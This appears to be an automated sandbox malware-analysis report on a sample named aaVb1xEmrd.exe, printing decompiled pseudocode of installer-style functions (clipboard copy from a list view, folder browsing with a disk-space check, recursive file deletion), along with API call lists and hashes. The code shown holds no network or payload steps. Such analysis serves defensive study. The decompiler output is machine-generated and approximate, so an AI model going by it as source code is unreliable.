									_t163 = _t162 + SendMessageA(_v8, 0x102d, _t148,  &_v64);
									 *_t163 = 0xa0d;
									_t162 = _t163 + 2;
									_t148 = _t148 + 1;
								} while (_t148 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42e7ec == _t148) {
							ShowWindow( *0x42f024, 8);
							if( *0x42f0ac == _t148) {
								E00404D69( *((intOrPtr*)( *0x429c58 + 0x34)), _t148);
							}
							E00403D88(1);
							goto L24;
						}
						 *0x429850 = 2;
						E00403D88(0x78);
						goto L19;
					} else {
						if(_a12 != 0x403) {
							L19:
							return E00403E16(_t153, _a12, _a16);
						}
						ShowWindow( *0x42e7f0, _t148);
						ShowWindow(_v8, 8);
						E00404182();
						goto L16;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_v56 = 2;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42f028;
				_a12 =  *((intOrPtr*)(_t123 + 0x5c));
				_a8 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e7f0 = GetDlgItem(_a4, 0x403);
				 *0x42e7e8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e804 = _t127;
				_v8 = _t127;
				E00403DE4( *0x42e7f0);
				 *0x42e7f4 = E0040460B(4);
				 *0x42e80c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t148) {
					SendMessageA(_v8, 0x1024, _t148, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403DAF(_a4);
				if(( *0x42f030 & 0x00000003) != 0) {
					ShowWindow( *0x42e7f0, _t148);
					if(( *0x42f030 & 0x00000002) != 0) {
						 *0x42e7f0 = _t148;
					} else {
						ShowWindow(_v8, 8);
					}
				}
				_t157 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t157, 0x401, _t148, 0x75300000);
				if(( *0x42f030 & 0x00000004) != 0) {
					SendMessageA(_t157, 0x409, _t148, _a8);
					SendMessageA(_t157, 0x2001, _t148, _a12);
				}
				goto L36;
			}
































                                                                      0x00404eb5
                                                                      0x00404eb8
                                                                      0x00404ec0
                                                                      0x00404ec3
                                                                      0x0040504f
                                                                      0x00405073
                                                                      0x00405073
                                                                      0x00405085
                                                                      0x004050a4
                                                                      0x004050aa
                                                                      0x004050ff
                                                                      0x00405102
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405104
                                                                      0x0040510a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405114
                                                                      0x0040511c
                                                                      0x0040511f
                                                                      0x0040521b
                                                                      0x00000000
                                                                      0x0040521b
                                                                      0x00405125
                                                                      0x0040512b
                                                                      0x0040512d
                                                                      0x0040512e
                                                                      0x0040513a
                                                                      0x00405140
                                                                      0x00405146
                                                                      0x0040515d
                                                                      0x00405163
                                                                      0x00405148
                                                                      0x0040514f
                                                                      0x00405155
                                                                      0x00405158
                                                                      0x00405158
                                                                      0x0040517c
                                                                      0x00405187
                                                                      0x00405188
                                                                      0x0040518b
                                                                      0x00405192
                                                                      0x00405199
                                                                      0x004051a1
                                                                      0x004051a1
                                                                      0x004051b8
                                                                      0x004051b8
                                                                      0x004051bf
                                                                      0x004051c5
                                                                      0x004051ce
                                                                      0x004051d5
                                                                      0x004051de
                                                                      0x004051e0
                                                                      0x004051e3
                                                                      0x004051f2
                                                                      0x004051f4
                                                                      0x004051fa
                                                                      0x004051fb
                                                                      0x004051fc
                                                                      0x00405204
                                                                      0x0040520f
                                                                      0x00405215
                                                                      0x00405215
                                                                      0x00000000
                                                                      0x0040517c
                                                                      0x004050b2
                                                                      0x004050e0
                                                                      0x004050e8
                                                                      0x004050f3
                                                                      0x004050f3
                                                                      0x004050fa
                                                                      0x00000000
                                                                      0x004050fa
                                                                      0x004050b6
                                                                      0x004050c0
                                                                      0x00000000
                                                                      0x00405087
                                                                      0x0040508d
                                                                      0x004050c5
                                                                      0x00000000
                                                                      0x004050cc
                                                                      0x00405096
                                                                      0x0040509d
                                                                      0x0040509f
                                                                      0x00000000
                                                                      0x0040509f
                                                                      0x00405085
                                                                      0x00404ec9
                                                                      0x00404ecd
                                                                      0x00404ed6
                                                                      0x00404edd
                                                                      0x00404ee0
                                                                      0x00404ee3
                                                                      0x00404ee6
                                                                      0x00404ee7
                                                                      0x00404ee8
                                                                      0x00404f01
                                                                      0x00404f04
                                                                      0x00404f0e
                                                                      0x00404f1d
                                                                      0x00404f25
                                                                      0x00404f2d
                                                                      0x00404f32
                                                                      0x00404f35
                                                                      0x00404f41
                                                                      0x00404f4a
                                                                      0x00404f53
                                                                      0x00404f76
                                                                      0x00404f7c
                                                                      0x00404f8d
                                                                      0x00404f92
                                                                      0x00404fa0
                                                                      0x00404fae
                                                                      0x00404fae
                                                                      0x00404fb3
                                                                      0x00404fc1
                                                                      0x00404fc1
                                                                      0x00404fc6
                                                                      0x00404fc9
                                                                      0x00404fce
                                                                      0x00404fda
                                                                      0x00404fe3
                                                                      0x00404ff0
                                                                      0x00404fff
                                                                      0x00404ff2
                                                                      0x00404ff7
                                                                      0x00404ff7
                                                                      0x00404ff0
                                                                      0x00405014
                                                                      0x0040501d
                                                                      0x00405026
                                                                      0x00405036
                                                                      0x00405042
                                                                      0x00405042
                                                                      0x00000000

                                                                      APIs
                                                                      • GetDlgItem.USER32 ref: 00404F07
                                                                      • GetDlgItem.USER32 ref: 00404F16
                                                                      • GetDlgItem.USER32 ref: 00404F25
                                                                        • Part of subcall function 00403DE4: SendMessageA.USER32(00000028,?,00000001,00403C17), ref: 00403DF2
                                                                      • GetClientRect.USER32 ref: 00404F53
                                                                      • GetSystemMetrics.USER32 ref: 00404F5B
                                                                      • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F7C
                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F8D
                                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 00404FA0
                                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 00404FAE
                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FC1
                                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FE3
                                                                      • ShowWindow.USER32(?,00000008), ref: 00404FF7
                                                                      • GetDlgItem.USER32 ref: 0040500D
                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040501D
                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405036
                                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405042
                                                                      • GetDlgItem.USER32 ref: 0040505E
                                                                      • CreateThread.KERNEL32 ref: 0040506C
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405073
                                                                      • ShowWindow.USER32(00000000), ref: 00405096
                                                                      • ShowWindow.USER32(?,00000008), ref: 0040509D
                                                                      • ShowWindow.USER32(00000008), ref: 004050E0
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405114
                                                                      • CreatePopupMenu.USER32 ref: 00405125
                                                                      • AppendMenuA.USER32 ref: 0040513A
                                                                      • GetWindowRect.USER32 ref: 0040514F
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405173
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051AF
                                                                      • OpenClipboard.USER32(00000000), ref: 004051BF
                                                                      • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051C5
                                                                      • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051CE
                                                                      • GlobalLock.KERNEL32 ref: 004051D8
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051EC
                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405204
                                                                      • SetClipboardData.USER32 ref: 0040520F
                                                                      • CloseClipboard.USER32 ref: 00405215
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID:
                                                                      • API String ID: 590372296-0
                                                                      • Opcode ID: 059c8a88734144d064b442f224168d5c0128116e7816f1b17e35158b87d491bc
                                                                      • Instruction ID: 0c87cf74621d28695fff580983f0b59ae02cf5e4fdabc25a535abfb09c427772
                                                                      • Opcode Fuzzy Hash: 059c8a88734144d064b442f224168d5c0128116e7816f1b17e35158b87d491bc
                                                                      • Instruction Fuzzy Hash: 37A15A71900209BFDB119FA0DD89EAE7FB9FB44354F40413AFA04BA2A0C7755E419FA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004041ED, Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 244stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 65%
                                                                      			E004041ED(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t113;
				intOrPtr* _t127;
				signed int _t139;
				signed int _t144;
				CHAR* _t150;

				_t75 =  *0x429c58;
				_v36 = _t75;
				_t150 = ( *(_t75 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {
					E0040527E(0x3fb, _t150);
					E00405BD3(_t150);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t144 = _t143 | 0xffffffff;
							E0040527E(0x3fb, _t150);
							if(E0040557D(_t169, _t150) == 0) {
								_v8 = 1;
							}
							E004059A4(0x429450, _t150);
							_t80 = E00405530(0x429450);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;
							}
							_t81 = E00405CAA("KERNEL32.dll", "GetDiskFreeSpaceExA");
							if(_t81 == 0) {
								L29:
								_t86 = GetDiskFreeSpaceA(0x429450,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L32;
								}
								_t100 = _v20 * _v28;
								__eflags = _t100;
								_t144 = MulDiv(_t100, _v16, 0x400);
								goto L31;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x429450);
								if( *_t81() == 0) {
									goto L29;
								}
								_t144 = (_v40 << 0x00000020 | _v44) >> 0xa;
								L31:
								_v12 = 1;
								L32:
								if(_t144 < E0040460B(5)) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42e7fc + 0x10)) != 0) {
									E00404556(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x429440);
									} else {
										E00404556(0x400, 0xfffffffc, _t144);
									}
								}
								_t88 = _v8;
								 *0x42f0c4 = _t88;
								if(_t88 == 0) {
									_v8 = E00401410(7);
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
									_v8 = 0;
								}
								E00403DD1(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x42a474 == 0) {
									E00404182();
								}
								 *0x42a474 = 0;
								goto L46;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L46;
						}
						goto L22;
					}
					_t105 = _a12 & 0x0000ffff;
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {
							_t139 = 7;
							memset( &_v72, 0, _t139 << 2);
							_t143 = 0x42a488;
							_v76 = _a4;
							_v68 = 0x42a488;
							_v56 = E004044F0;
							_v52 = _t150;
							_v64 = E004059C6(0x3fb, 0x42a488, _t150);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x429858, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t110);
								E0040549D(_t150);
								_t113 =  *((intOrPtr*)( *0x42f028 + 0x11c));
								if(_t113 != 0 && _t150 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									_push(_t113);
									_push(0);
									E004059C6(0x3fb, 0x42a488, _t150);
									_t143 = 0x42dfc0;
									if(lstrcmpiA(0x42dfc0, 0x42a488) != 0) {
										lstrcatA(_t150, 0x42dfc0);
									}
								}
								 *0x42a474 =  *0x42a474 + 1;
								SetDlgItemTextA(_a4, 0x3fb, _t150);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L46;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t143 = GetDlgItem(_a4, 0x3fb);
					if(E00405509(_t150) != 0 && E00405530(_t150) == 0) {
						E0040549D(_t150);
					}
					 *0x42e7f8 = _a4;
					SetWindowTextA(_t143, _t150);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403DAF(_a4);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403DAF(_a4);
					E00403DE4(_t143);
					_t127 = E00405CAA("shlwapi.dll", "SHAutoComplete");
					if(_t127 == 0) {
						L46:
						return E00403E16(_a8, _a12, _a16);
					}
					 *_t127(_t143, 1);
					goto L8;
				}
			}




































                                                                      0x004041f3
                                                                      0x004041fa
                                                                      0x00404206
                                                                      0x00404214
                                                                      0x0040421c
                                                                      0x00404220
                                                                      0x00404226
                                                                      0x00404226
                                                                      0x00404232
                                                                      0x004042ac
                                                                      0x004042b3
                                                                      0x00404388
                                                                      0x0040438f
                                                                      0x0040439e
                                                                      0x0040439e
                                                                      0x004043a2
                                                                      0x004043a8
                                                                      0x004043ab
                                                                      0x004043b8
                                                                      0x004043ba
                                                                      0x004043ba
                                                                      0x004043c8
                                                                      0x004043ce
                                                                      0x004043d5
                                                                      0x004043d7
                                                                      0x004043d7
                                                                      0x004043e4
                                                                      0x004043f0
                                                                      0x00404414
                                                                      0x00404425
                                                                      0x0040442b
                                                                      0x0040442d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404433
                                                                      0x00404433
                                                                      0x00404441
                                                                      0x00000000
                                                                      0x004043f2
                                                                      0x004043f5
                                                                      0x004043f9
                                                                      0x004043fd
                                                                      0x004043fe
                                                                      0x00404403
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040440b
                                                                      0x00404443
                                                                      0x00404443
                                                                      0x0040444a
                                                                      0x00404453
                                                                      0x00404455
                                                                      0x00404455
                                                                      0x00404467
                                                                      0x00404471
                                                                      0x00404479
                                                                      0x0040448f
                                                                      0x0040447b
                                                                      0x0040447f
                                                                      0x0040447f
                                                                      0x00404479
                                                                      0x00404494
                                                                      0x00404499
                                                                      0x0040449e
                                                                      0x004044a7
                                                                      0x004044a7
                                                                      0x004044b0
                                                                      0x004044b2
                                                                      0x004044b2
                                                                      0x004044be
                                                                      0x004044c6
                                                                      0x004044d0
                                                                      0x004044d0
                                                                      0x004044d5
                                                                      0x00000000
                                                                      0x004044d5
                                                                      0x004043f0
                                                                      0x00404391
                                                                      0x00404398
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404398
                                                                      0x004042b9
                                                                      0x004042bf
                                                                      0x004042d9
                                                                      0x004042de
                                                                      0x004042e8
                                                                      0x004042ef
                                                                      0x004042f4
                                                                      0x004042fe
                                                                      0x00404301
                                                                      0x00404304
                                                                      0x0040430b
                                                                      0x00404313
                                                                      0x00404316
                                                                      0x0040431a
                                                                      0x00404321
                                                                      0x00404329
                                                                      0x00404381
                                                                      0x0040432b
                                                                      0x0040432c
                                                                      0x00404333
                                                                      0x0040433d
                                                                      0x00404345
                                                                      0x0040434f
                                                                      0x00404350
                                                                      0x00404352
                                                                      0x00404358
                                                                      0x00404366
                                                                      0x0040436a
                                                                      0x0040436a
                                                                      0x00404366
                                                                      0x0040436f
                                                                      0x0040437a
                                                                      0x0040437a
                                                                      0x00404329
                                                                      0x00000000
                                                                      0x004042de
                                                                      0x004042cc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004042d2
                                                                      0x00000000
                                                                      0x00404234
                                                                      0x0040423f
                                                                      0x00404248
                                                                      0x00404255
                                                                      0x00404255
                                                                      0x0040425f
                                                                      0x00404264
                                                                      0x0040426d
                                                                      0x00404270
                                                                      0x00404275
                                                                      0x0040427d
                                                                      0x00404280
                                                                      0x00404285
                                                                      0x0040428b
                                                                      0x0040429a
                                                                      0x004042a1
                                                                      0x004044db
                                                                      0x004044ed
                                                                      0x004044ed
                                                                      0x004042aa
                                                                      0x00000000
                                                                      0x004042aa

                                                                      APIs
                                                                      • GetDlgItem.USER32 ref: 00404238
                                                                      • SetWindowTextA.USER32(00000000,?), ref: 00404264
                                                                      • SHBrowseForFolderA.SHELL32(?,00429858,?), ref: 00404321
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040432C
                                                                      • lstrcmpiA.KERNEL32(0042DFC0,0042A488,00000000,?,?), ref: 0040435E
                                                                      • SetDlgItemTextA.USER32 ref: 0040437A
                                                                      • lstrcatA.KERNEL32(?,0042DFC0), ref: 0040436A
                                                                        • Part of subcall function 0040527E: GetDlgItemTextA.USER32 ref: 00405291
                                                                        • Part of subcall function 00405BD3: CharNextA.USER32(?,*?|<>/":,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C2B
                                                                        • Part of subcall function 00405BD3: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C38
                                                                        • Part of subcall function 00405BD3: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C3D
                                                                        • Part of subcall function 00405BD3: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C4D
                                                                      • GetDiskFreeSpaceA.KERNEL32(00429450,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,00429450,00429450,?,?,000003FB,?), ref: 00404425
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040443B
                                                                      • SetDlgItemTextA.USER32 ref: 0040448F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                      • String ID: A$C:\Users\user\AppData\Local\Temp$GetDiskFreeSpaceExA$KERNEL32.dll$SHAutoComplete$shlwapi.dll
                                                                      • API String ID: 2246997448-2494545068
                                                                      • Opcode ID: e44a68ac050da93dd24c92bf31600596efc48c1b45f7a76c2c12c5fd1fe0f47b
                                                                      • Instruction ID: 38b00ee318b9a2f141b332203b1ca97f43baab82eb53c12537abaa59d0bd0c71
                                                                      • Opcode Fuzzy Hash: e44a68ac050da93dd24c92bf31600596efc48c1b45f7a76c2c12c5fd1fe0f47b
                                                                      • Instruction Fuzzy Hash: 79817DB1A00218BBDF11AFA1DC45A9F7BB8EF44354F10407BFA04B62D1D77C9A418B69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004052DC, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 152filestringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 94%
                                                                      			E004052DC(void* __edi, void* __eflags, signed int _a4, signed int _a8) {
				void* _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t38;
				char* _t50;
				signed int _t53;
				signed int _t56;
				signed int _t62;
				signed int _t64;
				void* _t66;
				CHAR* _t67;
				signed char _t68;
				CHAR* _t71;
				char* _t75;

				_t67 = _a4;
				_t38 = E0040557D(__eflags, _t67);
				_t68 = _a8;
				_v12 = _t38;
				if((_t68 & 0x00000008) != 0) {
					_t64 = DeleteFileA(_t67);
					asm("sbb eax, eax");
					_t66 =  ~_t64 + 1;
					 *0x42f0a8 =  *0x42f0a8 + _t66;
					return _t66;
				}
				_a4 = _t68;
				_t7 =  &_a4;
				 *_t7 = _a4 & 0x00000001;
				__eflags =  *_t7;
				if( *_t7 == 0) {
					L5:
					E004059A4(0x42b490, _t67);
					__eflags = _a4;
					if(_a4 == 0) {
						E004054E4(_t67);
					} else {
						lstrcatA(0x42b490, "\\*.*");
					}
					lstrcatA(_t67, 0x409010);
					_t71 =  &(_t67[lstrlenA(_t67)]);
					_t38 = FindFirstFileA(0x42b490,  &_v332);
					__eflags = _t38 - 0xffffffff;
					_v8 = _t38;
					if(_t38 == 0xffffffff) {
						L26:
						__eflags = _a4;
						if(_a4 != 0) {
							_t32 = _t71 - 1;
							 *_t32 =  *(_t71 - 1) & 0x00000000;
							__eflags =  *_t32;
						}
						goto L28;
					} else {
						goto L9;
					}
					do {
						L9:
						_t75 =  &(_v332.cFileName);
						_t50 = E004054C8( &(_v332.cFileName), 0x3f);
						__eflags =  *_t50;
						if( *_t50 != 0) {
							__eflags = _v332.cAlternateFileName;
							if(_v332.cAlternateFileName != 0) {
								_t75 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t75 - 0x2e;
						if( *_t75 != 0x2e) {
							L16:
							E004059A4(_t71, _t75);
							__eflags = _v332.dwFileAttributes & 0x00000010;
							if((_v332.dwFileAttributes & 0x00000010) == 0) {
								E00405661(_t67);
								_t53 = DeleteFileA(_t67);
								__eflags = _t53;
								if(_t53 != 0) {
									E00404D69(0xfffffff2, _t67);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x42f0a8 =  *0x42f0a8 + 1;
									} else {
										E00404D69(0xfffffff1, _t67);
										_push(0);
										_push(_t67);
										E004056F7();
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E004052DC(_t71, __eflags, _t67, _a8);
								}
							}
							goto L24;
						}
						_t62 =  *((intOrPtr*)(_t75 + 1));
						__eflags = _t62;
						if(_t62 == 0) {
							goto L24;
						}
						__eflags = _t62 - 0x2e;
						if(_t62 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t75 + 2));
						if( *((char*)(_t75 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t56 = FindNextFileA(_v8,  &_v332);
						__eflags = _t56;
					} while (_t56 != 0);
					_t38 = FindClose(_v8);
					goto L26;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00405C6C(_t67);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E0040549D(_t67);
							E00405661(_t67);
							_t38 = RemoveDirectoryA(_t67);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00404D69(0xffffffe5, _t67);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404D69(0xfffffff1, _t67);
							_push(0);
							_push(_t67);
							return E004056F7();
						}
						L30:
						 *0x42f0a8 =  *0x42f0a8 + 1;
						return _t38;
					}
					__eflags = _t68 & 0x00000002;
					if((_t68 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

















                                                                      0x004052e6
                                                                      0x004052eb
                                                                      0x004052f0
                                                                      0x004052f3
                                                                      0x004052f9
                                                                      0x004052fc
                                                                      0x00405304
                                                                      0x00405306
                                                                      0x00405307
                                                                      0x00000000
                                                                      0x00405307
                                                                      0x00405312
                                                                      0x00405316
                                                                      0x00405316
                                                                      0x00405316
                                                                      0x0040531a
                                                                      0x0040532d
                                                                      0x00405334
                                                                      0x00405339
                                                                      0x0040533d
                                                                      0x0040534d
                                                                      0x0040533f
                                                                      0x00405345
                                                                      0x00405345
                                                                      0x00405358
                                                                      0x0040536d
                                                                      0x0040536f
                                                                      0x00405375
                                                                      0x00405378
                                                                      0x0040537b
                                                                      0x00405438
                                                                      0x00405438
                                                                      0x0040543c
                                                                      0x0040543e
                                                                      0x0040543e
                                                                      0x0040543e
                                                                      0x0040543e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405381
                                                                      0x00405381
                                                                      0x0040538a
                                                                      0x00405390
                                                                      0x00405395
                                                                      0x00405398
                                                                      0x0040539a
                                                                      0x0040539e
                                                                      0x004053a0
                                                                      0x004053a0
                                                                      0x0040539e
                                                                      0x004053a3
                                                                      0x004053a6
                                                                      0x004053b9
                                                                      0x004053bb
                                                                      0x004053c0
                                                                      0x004053c7
                                                                      0x004053df
                                                                      0x004053e5
                                                                      0x004053eb
                                                                      0x004053ed
                                                                      0x00405412
                                                                      0x004053ef
                                                                      0x004053ef
                                                                      0x004053f3
                                                                      0x00405407
                                                                      0x004053f5
                                                                      0x004053f8
                                                                      0x004053fd
                                                                      0x004053ff
                                                                      0x00405400
                                                                      0x00405400
                                                                      0x004053f3
                                                                      0x004053c9
                                                                      0x004053cf
                                                                      0x004053d1
                                                                      0x004053d7
                                                                      0x004053d7
                                                                      0x004053d1
                                                                      0x00000000
                                                                      0x004053c7
                                                                      0x004053a8
                                                                      0x004053ab
                                                                      0x004053ad
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004053af
                                                                      0x004053b1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004053b3
                                                                      0x004053b7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405417
                                                                      0x00405421
                                                                      0x00405427
                                                                      0x00405427
                                                                      0x00405432
                                                                      0x00000000
                                                                      0x0040531c
                                                                      0x0040531c
                                                                      0x0040531e
                                                                      0x00405442
                                                                      0x00405445
                                                                      0x00405448
                                                                      0x0040549a
                                                                      0x0040549a
                                                                      0x0040549a
                                                                      0x0040544a
                                                                      0x0040544d
                                                                      0x00405458
                                                                      0x0040545d
                                                                      0x0040545f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405462
                                                                      0x00405468
                                                                      0x0040546e
                                                                      0x00405474
                                                                      0x00405476
                                                                      0x00000000
                                                                      0x00405492
                                                                      0x00405478
                                                                      0x0040547c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405481
                                                                      0x00405486
                                                                      0x00405487
                                                                      0x00000000
                                                                      0x00405488
                                                                      0x0040544f
                                                                      0x0040544f
                                                                      0x00000000
                                                                      0x0040544f
                                                                      0x00405324
                                                                      0x00405327
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405327

                                                                      APIs
                                                                      • DeleteFileA.KERNEL32(?,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 004052FC
                                                                      • lstrcatA.KERNEL32(0042B490,\*.*,0042B490,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 00405345
